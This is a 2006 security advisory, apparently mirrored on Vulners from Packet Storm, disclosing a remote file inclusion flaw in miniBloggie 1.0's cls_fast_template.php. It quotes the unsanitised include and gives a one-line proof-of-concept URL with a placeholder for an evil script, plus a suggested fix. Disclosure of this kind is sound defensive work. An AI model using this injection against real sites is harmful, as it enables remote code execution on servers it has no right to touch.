Lucene search
K

miniBloggie10.txt

🗓️ 27 Aug 2006 00:00:00Reported by Sh3llType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Remote File Inclusion in miniBloggie 1.0 by Sh3ll, Venedor: http://www.mywebland.co

Code
`---------------------------------------------------------------------------------------  
miniBloggie 1.0 fname Remote File Inclusion  
---------------------------------------------------------------------------------------  
Author : Sh3ll  
Date : 2006/05/01  
HomePage : http://www.sh3ll.ir  
Contact : sh3ll[at]sh3ll[dot]ir  
---------------------------------------------------------------------------------------  
Affected Software Description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : miniBloggie   
version : 1.0  
Venedor : http://www.mywebland.com  
Class : Remote File Inclusion  
Risk : High  
Summary : minibloggie, a mini blog script yet effective built using fast template   
for easy customisation. Using Mysql database system with edit, delete, , support smiley   
& BBcode, adminstrator log in for easy website management.  
  
---------------------------------------------------------------------------------------  
Vulnerability:  
~~~~~~~~~~~~~  
The Problem Exists Is in The cls_fast_template.php When Used The Variable in a $fname  
include() Function Without Being Declared.  
---------------------------------cls_fast_template.php---------------------------------  
....  
<?php  
else {  
fclose($fp);  
include $fname;  
return;  
}  
...  
---------------------------------------------------------------------------------------  
PoC:  
~~~  
http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]  
  
Solution:  
~~~~~~~~  
Sanitize Variabel $fname in cls_fast_template.php  
----------------------------------------------------------------------------------------  
Note:  
~~~~  
Venedor Contacted, But No Response. So Do a Dirty Patch.  
----------------------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena  
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation